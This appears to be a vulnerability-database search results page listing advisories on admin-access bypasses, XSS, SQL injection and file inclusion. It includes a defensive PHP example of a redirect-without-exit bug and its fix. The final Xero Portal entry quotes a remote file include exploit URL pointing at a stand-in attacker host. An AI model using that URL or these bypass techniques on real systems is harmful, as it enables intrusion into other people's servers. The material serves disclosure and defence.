85 matches found
CVE-2022-35909
Improper access control
In Jellyfin before 10.8, the /users endpoint has incorrect access control for admin functionality...
CVE-2022-35909 refers to Jellyfin prior to version 10.8, where the "/users" endpoint has incorrect access control for admin functionality. The publicly available documents identify this as an admin-access control flaw that could enable unauthorized admin-like access via the mentioned endpoint. The...
EUVD-2022-52756
Roxy-wi is an open source web interface for managing Haproxy, Nginx, Apache and Keepalived servers. A vulnerability in Roxy-wi allows a remote, unauthenticated attacker to bypass authentication and access admin functionality by sending a specially crafted HTTP request. This affects Roxywi version...
CVE-2022-31125
CVE-2022-31125: Roxy-WI authentication bypass vulnerability allowing remote, unauthenticated access to admin functionality via a crafted HTTP request. Affected: Roxy-WI before 6.1.1.0. Exploitation exists (exploit-db/PoC references). Remediation: upgrade to version 6.1.1.0 or later; exploit examp...
CVE-2019-1010147
Cross site scripting
Yellowfin Smart Reporting All Versions Prior to 7.3 is affected by: Incorrect Access Control - Privilege Escalation. The impact is: the victim is attacked, and the attacker gains access to admin functionality through the victim's browser and controls that browser. The component is: MIAdminStyles.i4. The attack vector is: Victims are...
Revive Adserver: Authentication Bypass by abusing Insecure crypto tokens in /lib/OA/Dal/PasswordRecovery.php:
Hi, this is a fun bug I came across while doing a pentest for a client. After going through Revive Adserver's code for a few hours, I found this authentication bypass. This vulnerability seems to affect all versions, including the latest one. I was sent by one of your developers to report it here...
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities
Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities. Affected versions: Nagios Incident Manager...
Page2Flip 2.5 Missing Access Control
Advisory ID: SYSS-2015-033. Product: Page2Flip. Vendor: w!ssenswerft GmbH. Affected Versions: Premium App 2.5, probably also the Business App and Basic App, and lower versions. Tested Versions: Premium App 2.5. Vulnerability Type: Missing Function Leve...
HelpDezk Multiple Vulnerabilities (Mar 2015)
HelpDezk is prone to multiple vulnerabilities. (Greenbone AG vulnerability test description, 2015; some text descriptions may be excerpted from referenced sources and are copyright of the respective right holders.)
Belchior Foundry VCard 2.8 Authentication Bypass Vulnerability
Source: http://www.securityfocus.com/bid/9910/info. It has been reported that vCard is prone to a remote authentication bypass vulnerability. The issue is due to a design error that allows a malicious user access to certain admin functionality without havin...
Traq 2.3 Authentication Bypass / Code Execution
The admin check tests the user's group for the isadmin flag and, when it is not set, calls header("Location: login.php"); and then carries on. This function is called by every script in the /admincp/ directory to make sure the user has admin rights, but the authorization scheme is broken because the header function does not stop the execution flow. This can be exploited by malicio...
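The Traq entry above describes a check that redirects but never terminates. The following is an added example, not Traq's own code, that reconstructs that bug class beside its fix. The shape of the user record (a `group` array with an `isadmin` flag) and the `privileged_action` stand-in are assumptions made for the example; only the "header() without exit" pattern comes from the entry.

```php
<?php
// Added example (not Traq's code): the redirect-without-exit admin check
// described in the Traq 2.3 entry, and the corrected form.
// Assumptions not taken from the page: $user['group']['isadmin'] holds the
// admin flag, and privileged_action() stands in for what an /admincp/ script does.

// Broken check: header() only queues a response header. Nothing stops the
// script, so every statement after the call still runs for a non-admin request.
function require_admin_broken(array $user): void
{
    if (empty($user['group']['isadmin'])) {
        header('Location: login.php');
        // no exit here: the browser is redirected, but the admin page
        // (and any side effect it has) is produced anyway
    }
}

// Fixed check: terminate right after queuing the redirect. 303 is used so a
// POST aimed at an admin script is not replayed against login.php.
function require_admin(array $user): void
{
    if (empty($user['group']['isadmin'])) {
        header('Location: login.php', true, 303);
        exit;
    }
}

// Stand-in for the privileged work an admin script would do.
function privileged_action(string $label): void
{
    echo "[$label] privileged action executed\n";
}

// Constructed sample request: an anonymous visitor with no admin flag.
$anonymous = ['group' => ['isadmin' => false]];

require_admin_broken($anonymous);
privileged_action('broken');   // reached: the broken check did not stop the script

require_admin($anonymous);
privileged_action('fixed');    // not reached: exit above ended the script
```

Run it with the PHP CLI, where header() is inert but the control flow is identical to a web request: the first privileged_action call executes, the second does not. The black-box check for this class is to request an admin script without a session and without following redirects; a 302/303 whose body already contains the admin page, or whose side effect occurred, is the tell. `curl -s -D - -o body.html http://target/admincp/<admin-script>` keeps the headers and body apart so both can be inspected (path is a placeholder).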
CVE-2010-5051
Cross-site scripting (XSS) vulnerability in admin/core/adminfunc.php in razorCMS 1.0 stable allows remote attackers to inject arbitrary web script or HTML via the content parameter in an edit action to admin/index.php...
Shareasale Script SQL Injection Vulnerability
Exploit for PHP platform in category web applications. Shareasale Script SQL Injection Vulnerability...
CVE-2008-7051
AJ Square AJ Article allows remote attackers to bypass authentication and access administrator functionality via a direct request to (1) user.php, (2) articles.php, (3) articlesuspend.php, (4) site.php, (5) statistics.php, (6) mail.php, (7) category.php, (8) subcategory.php, (9) changepassword.php, (10) polling.php,...
CVE-2007-0873
nabopoll 1.1.2 allows remote attackers to bypass authentication and access certain administrative functionality via a direct request for (1) config_edit.php, (2) template_edit.php, or (3) survey_edit.php in admin/...
NABOpoll 1.1.2 is vulnerable to an authentication bypass that lets remote attackers access certain administrative functionality by directly requesting admin URLs. Specifically, requesting (1) config_edit.php, (2) template_edit.php, or (3) survey_edit.php in the admin/ directory can bypass login c...
xero-rfi.txt
(c) XORON - 2007. Bug name: Xero Portal v1.2 phpbb_root_path Remote File Include Vulnerability (the advisory's own title says Local File Include, but the exploit URL supplies a remote path, and the file is named xero-rfi.txt). Script Name: Xero Portal v1.2. Wrong code: require($phpbb_root_path . 'includes/bbcode.'.$phpEx); Exploit: www.target.com/scriptpat/admin/adminlinkdb.php?phpbb_root_path=http://evilscripts?...